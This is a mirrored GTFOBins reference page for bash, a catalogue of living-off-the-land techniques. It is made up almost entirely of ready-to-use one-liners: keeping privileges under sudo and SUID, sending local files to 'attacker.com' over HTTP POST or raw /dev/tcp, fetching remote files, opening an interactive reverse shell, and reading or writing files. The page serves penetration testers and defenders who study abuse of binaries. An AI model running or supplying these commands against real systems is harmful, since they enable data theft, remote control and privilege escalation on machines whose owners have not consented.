1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 19:01:59 +02:00
GTFOBins.github.io/_gtfobins/bash.md
2018-05-28 20:12:44 +02:00

2.1 KiB

functions
execute-interactive sudo-enabled suid-enabled upload download reverse-shell-interactive file-read file-write
code
bash
code
sudo bash
code
./bash -p
description code
Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. export RHOST=attacker.com export RPORT=12345 export LFILE=file_to_send bash -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
description code
Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. export RHOST=attacker.com export RPORT=12345 export LFILE=file_to_send bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
description code
Fetch a remote file via HTTP GET request. export RHOST=attacker.com export RPORT=12345 export LFILE=file_to_get bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ 3<>/dev/tcp/$RHOST/$RPORT \ | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
description code
Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. export RHOST=attacker.com export RPORT=12345 export LFILE=file_to_get bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. export RHOST=attacker.com export RPORT=12345 bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
description code
It trims trailing newlines. export LFILE=file_to_read bash -c 'echo "$(<$LFILE)"'
description code
It trims trailing newlines. export LFILE=file_to_read bash -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
code
export LFILE=file_to_write bash -c 'echo data > $LFILE'